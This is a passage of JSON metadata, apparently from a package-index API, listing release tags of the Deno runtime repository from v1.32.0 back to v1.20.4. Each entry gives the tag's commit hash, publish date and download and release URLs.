/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd